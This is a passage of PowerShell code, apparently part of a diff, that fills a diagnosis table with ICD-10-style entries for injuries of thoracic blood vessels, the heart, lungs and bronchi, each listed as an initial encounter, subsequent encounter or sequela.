+ $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified innominate or subclavian vein","Other specified injury of unspecified innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified innominate or subclavian vein","Other specified injury of unspecified innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right pulmonary blood vessels","Unspecified injury of right pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right pulmonary blood vessels","Unspecified injury of right pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right pulmonary blood vessels","Unspecified injury of right pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left pulmonary blood vessels","Unspecified injury of left pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left pulmonary blood vessels","Unspecified injury of left pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left pulmonary blood vessels","Unspecified injury of left pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified pulmonary blood vessels","Unspecified injury of unspecified pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified pulmonary blood vessels","Unspecified injury of unspecified pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified pulmonary blood vessels","Unspecified injury of unspecified pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of right pulmonary blood vessels","Minor laceration of right pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right pulmonary blood vessels","Minor laceration of right pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right pulmonary blood vessels","Minor laceration of right pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of left pulmonary blood vessels","Minor laceration of left pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left pulmonary blood vessels","Minor laceration of left pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left pulmonary blood vessels","Minor laceration of left pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified pulmonary blood vessels","Minor laceration of unspecified pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified pulmonary blood vessels","Minor laceration of unspecified pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified pulmonary blood vessels","Minor laceration of unspecified pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of right pulmonary blood vessels","Major laceration of right pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right pulmonary blood vessels","Major laceration of right pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right pulmonary blood vessels","Major laceration of right pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of left pulmonary blood vessels","Major laceration of left pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left pulmonary blood vessels","Major laceration of left pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left pulmonary blood vessels","Major laceration of left pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified pulmonary blood vessels","Major laceration of unspecified pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified pulmonary blood vessels","Major laceration of unspecified pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified pulmonary blood vessels","Major laceration of unspecified pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right pulmonary blood vessels","Other specified injury of right pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right pulmonary blood vessels","Other specified injury of right pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right pulmonary blood vessels","Other specified injury of right pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left pulmonary blood vessels","Other specified injury of left pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left pulmonary blood vessels","Other specified injury of left pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left pulmonary blood vessels","Other specified injury of left pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified pulmonary blood vessels","Other specified injury of unspecified pulmonary blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified pulmonary blood vessels","Other specified injury of unspecified pulmonary blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified pulmonary blood vessels","Other specified injury of unspecified pulmonary blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intercostal blood vessels, right side","Unspecified injury of intercostal blood vessels, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intercostal blood vessels, right side","Unspecified injury of intercostal blood vessels, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intercostal blood vessels, right side","Unspecified injury of intercostal blood vessels, right side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intercostal blood vessels, left side","Unspecified injury of intercostal blood vessels, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intercostal blood vessels, left side","Unspecified injury of intercostal blood vessels, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intercostal blood vessels, left side","Unspecified injury of intercostal blood vessels, left side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intercostal blood vessels, unspecified side","Unspecified injury of intercostal blood vessels, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intercostal blood vessels, unspecified side","Unspecified injury of intercostal blood vessels, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intercostal blood vessels, unspecified side","Unspecified injury of intercostal blood vessels, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intercostal blood vessels, right side","Laceration of intercostal blood vessels, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intercostal blood vessels, right side","Laceration of intercostal blood vessels, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intercostal blood vessels, right side","Laceration of intercostal blood vessels, right side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intercostal blood vessels, left side","Laceration of intercostal blood vessels, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intercostal blood vessels, left side","Laceration of intercostal blood vessels, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intercostal blood vessels, left side","Laceration of intercostal blood vessels, left side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intercostal blood vessels, unspecified side","Laceration of intercostal blood vessels, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intercostal blood vessels, unspecified side","Laceration of intercostal blood vessels, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intercostal blood vessels, unspecified side","Laceration of intercostal blood vessels, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of intercostal blood vessels, right side","Other specified injury of intercostal blood vessels, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intercostal blood vessels, right side","Other specified injury of intercostal blood vessels, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intercostal blood vessels, right side","Other specified injury of intercostal blood vessels, right side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of intercostal blood vessels, left side","Other specified injury of intercostal blood vessels, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intercostal blood vessels, left side","Other specified injury of intercostal blood vessels, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intercostal blood vessels, left side","Other specified injury of intercostal blood vessels, left side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of intercostal blood vessels, unspecified side","Other specified injury of intercostal blood vessels, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intercostal blood vessels, unspecified side","Other specified injury of intercostal blood vessels, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intercostal blood vessels, unspecified side","Other specified injury of intercostal blood vessels, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels of thorax, right side","Unspecified injury of other blood vessels of thorax, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels of thorax, right side","Unspecified injury of other blood vessels of thorax, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels of thorax, right side","Unspecified injury of other blood vessels of thorax, right side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels of thorax, left side","Unspecified injury of other blood vessels of thorax, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels of thorax, left side","Unspecified injury of other blood vessels of thorax, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels of thorax, left side","Unspecified injury of other blood vessels of thorax, left side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels of thorax, unspecified side","Unspecified injury of other blood vessels of thorax, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels of thorax, unspecified side","Unspecified injury of other blood vessels of thorax, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels of thorax, unspecified side","Unspecified injury of other blood vessels of thorax, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels of thorax, right side","Laceration of other blood vessels of thorax, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels of thorax, right side","Laceration of other blood vessels of thorax, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels of thorax, right side","Laceration of other blood vessels of thorax, right side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels of thorax, left side","Laceration of other blood vessels of thorax, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels of thorax, left side","Laceration of other blood vessels of thorax, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels of thorax, left side","Laceration of other blood vessels of thorax, left side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels of thorax, unspecified side","Laceration of other blood vessels of thorax, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels of thorax, unspecified side","Laceration of other blood vessels of thorax, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels of thorax, unspecified side","Laceration of other blood vessels of thorax, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels of thorax, right side","Other specified injury of other blood vessels of thorax, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels of thorax, right side","Other specified injury of other blood vessels of thorax, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels of thorax, right side","Other specified injury of other blood vessels of thorax, right side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels of thorax, left side","Other specified injury of other blood vessels of thorax, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels of thorax, left side","Other specified injury of other blood vessels of thorax, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels of thorax, left side","Other specified injury of other blood vessels of thorax, left side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels of thorax, unspecified side","Other specified injury of other blood vessels of thorax, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels of thorax, unspecified side","Other specified injury of other blood vessels of thorax, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels of thorax, unspecified side","Other specified injury of other blood vessels of thorax, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel of thorax","Unspecified injury of unspecified blood vessel of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel of thorax","Unspecified injury of unspecified blood vessel of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel of thorax","Unspecified injury of unspecified blood vessel of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel of thorax","Laceration of unspecified blood vessel of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel of thorax","Laceration of unspecified blood vessel of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel of thorax","Laceration of unspecified blood vessel of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel of thorax","Other specified injury of unspecified blood vessel of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel of thorax","Other specified injury of unspecified blood vessel of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel of thorax","Other specified injury of unspecified blood vessel of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of heart with hemopericardium","Unspecified injury of heart with hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of heart with hemopericardium","Unspecified injury of heart with hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of heart with hemopericardium","Unspecified injury of heart with hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of heart with hemopericardium","Contusion of heart with hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of heart with hemopericardium","Contusion of heart with hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of heart with hemopericardium","Contusion of heart with hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Mild laceration of heart with hemopericardium","Mild laceration of heart with hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Mild laceration of heart with hemopericardium","Mild laceration of heart with hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Mild laceration of heart with hemopericardium","Mild laceration of heart with hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Moderate laceration of heart with hemopericardium","Moderate laceration of heart with hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of heart with hemopericardium","Moderate laceration of heart with hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of heart with hemopericardium","Moderate laceration of heart with hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of heart with hemopericardium","Major laceration of heart with hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of heart with hemopericardium","Major laceration of heart with hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of heart with hemopericardium","Major laceration of heart with hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of heart with hemopericardium","Other injury of heart with hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of heart with hemopericardium","Other injury of heart with hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of heart with hemopericardium","Other injury of heart with hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of heart without hemopericardium","Unspecified injury of heart without hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of heart without hemopericardium","Unspecified injury of heart without hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of heart without hemopericardium","Unspecified injury of heart without hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of heart without hemopericardium","Contusion of heart without hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of heart without hemopericardium","Contusion of heart without hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of heart without hemopericardium","Contusion of heart without hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of heart without hemopericardium","Laceration of heart without hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of heart without hemopericardium","Laceration of heart without hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of heart without hemopericardium","Laceration of heart without hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of heart without hemopericardium","Other injury of heart without hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of heart without hemopericardium","Other injury of heart without hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of heart without hemopericardium","Other injury of heart without hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of heart, unspecified with or without hemopericardium","Unspecified injury of heart, unspecified with or without hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of heart, unspecified with or without hemopericardium","Unspecified injury of heart, unspecified with or without hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of heart, unspecified with or without hemopericardium","Unspecified injury of heart, unspecified with or without hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of heart, unspecified with or without hemopericardium","Contusion of heart, unspecified with or without hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of heart, unspecified with or without hemopericardium","Contusion of heart, unspecified with or without hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of heart, unspecified with or without hemopericardium","Contusion of heart, unspecified with or without hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of heart, unspecified with or without hemopericardium","Laceration of heart, unspecified with or without hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of heart, unspecified with or without hemopericardium","Laceration of heart, unspecified with or without hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of heart, unspecified with or without hemopericardium","Laceration of heart, unspecified with or without hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of heart, unspecified with or without hemopericardium","Other injury of heart, unspecified with or without hemopericardium, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of heart, unspecified with or without hemopericardium","Other injury of heart, unspecified with or without hemopericardium, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of heart, unspecified with or without hemopericardium","Other injury of heart, unspecified with or without hemopericardium, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic pneumothorax","Traumatic pneumothorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic pneumothorax","Traumatic pneumothorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic pneumothorax","Traumatic pneumothorax, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemothorax","Traumatic hemothorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemothorax","Traumatic hemothorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemothorax","Traumatic hemothorax, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemopneumothorax","Traumatic hemopneumothorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemopneumothorax","Traumatic hemopneumothorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemopneumothorax","Traumatic hemopneumothorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lung, unilateral","Unspecified injury of lung, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lung, unilateral","Unspecified injury of lung, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lung, unilateral","Unspecified injury of lung, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lung, bilateral","Unspecified injury of lung, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lung, bilateral","Unspecified injury of lung, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lung, bilateral","Unspecified injury of lung, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lung, unspecified","Unspecified injury of lung, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lung, unspecified","Unspecified injury of lung, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lung, unspecified","Unspecified injury of lung, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of lung, unilateral","Primary blast injury of lung, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of lung, unilateral","Primary blast injury of lung, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of lung, unilateral","Primary blast injury of lung, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of lung, bilateral","Primary blast injury of lung, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of lung, bilateral","Primary blast injury of lung, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of lung, bilateral","Primary blast injury of lung, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of lung, unspecified","Primary blast injury of lung, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of lung, unspecified","Primary blast injury of lung, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of lung, unspecified","Primary blast injury of lung, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of lung, unilateral","Contusion of lung, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of lung, unilateral","Contusion of lung, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of lung, unilateral","Contusion of lung, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of lung, bilateral","Contusion of lung, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of lung, bilateral","Contusion of lung, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of lung, bilateral","Contusion of lung, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of lung, unspecified","Contusion of lung, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of lung, unspecified","Contusion of lung, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of lung, unspecified","Contusion of lung, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of lung, unilateral","Laceration of lung, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lung, unilateral","Laceration of lung, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lung, unilateral","Laceration of lung, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of lung, bilateral","Laceration of lung, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lung, bilateral","Laceration of lung, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lung, bilateral","Laceration of lung, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of lung, unspecified","Laceration of lung, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lung, unspecified","Laceration of lung, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lung, unspecified","Laceration of lung, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Other injuries of lung, unilateral","Other injuries of lung, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of lung, unilateral","Other injuries of lung, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of lung, unilateral","Other injuries of lung, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Other injuries of lung, bilateral","Other injuries of lung, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of lung, bilateral","Other injuries of lung, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of lung, bilateral","Other injuries of lung, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Other injuries of lung, unspecified","Other injuries of lung, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of lung, unspecified","Other injuries of lung, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of lung, unspecified","Other injuries of lung, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bronchus, unilateral","Unspecified injury of bronchus, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bronchus, unilateral","Unspecified injury of bronchus, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bronchus, unilateral","Unspecified injury of bronchus, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bronchus, bilateral","Unspecified injury of bronchus, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bronchus, bilateral","Unspecified injury of bronchus, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bronchus, bilateral","Unspecified injury of bronchus, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bronchus, unspecified","Unspecified injury of bronchus, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bronchus, unspecified","Unspecified injury of bronchus, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bronchus, unspecified","Unspecified injury of bronchus, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of bronchus, unilateral","Primary blast injury of bronchus, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of bronchus, unilateral","Primary blast injury of bronchus, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of bronchus, unilateral","Primary blast injury of bronchus, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of bronchus, bilateral","Primary blast injury of bronchus, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of bronchus, bilateral","Primary blast injury of bronchus, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of bronchus, bilateral","Primary blast injury of bronchus, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of bronchus, unspecified","Primary blast injury of bronchus, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of bronchus, unspecified","Primary blast injury of bronchus, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of bronchus, unspecified","Primary blast injury of bronchus, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of bronchus, unilateral","Contusion of bronchus, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of bronchus, unilateral","Contusion of bronchus, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of bronchus, unilateral","Contusion of bronchus, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of bronchus, bilateral","Contusion of bronchus, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of bronchus, bilateral","Contusion of bronchus, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of bronchus, bilateral","Contusion of bronchus, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of bronchus, unspecified","Contusion of bronchus, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of bronchus, unspecified","Contusion of bronchus, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of bronchus, unspecified","Contusion of bronchus, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of bronchus, unilateral","Laceration of bronchus, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of bronchus, unilateral","Laceration of bronchus, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of bronchus, unilateral","Laceration of bronchus, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of bronchus, bilateral","Laceration of bronchus, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of bronchus, bilateral","Laceration of bronchus, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of bronchus, bilateral","Laceration of bronchus, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of bronchus, unspecified","Laceration of bronchus, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of bronchus, unspecified","Laceration of bronchus, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of bronchus, unspecified","Laceration of bronchus, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of bronchus, unilateral","Other injury of bronchus, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of bronchus, unilateral","Other injury of bronchus, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of bronchus, unilateral","Other injury of bronchus, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of bronchus, bilateral","Other injury of bronchus, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of bronchus, bilateral","Other injury of bronchus, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of bronchus, bilateral","Other injury of bronchus, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of bronchus, unspecified","Other injury of bronchus, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of bronchus, unspecified","Other injury of bronchus, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of bronchus, unspecified","Other injury of bronchus, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified 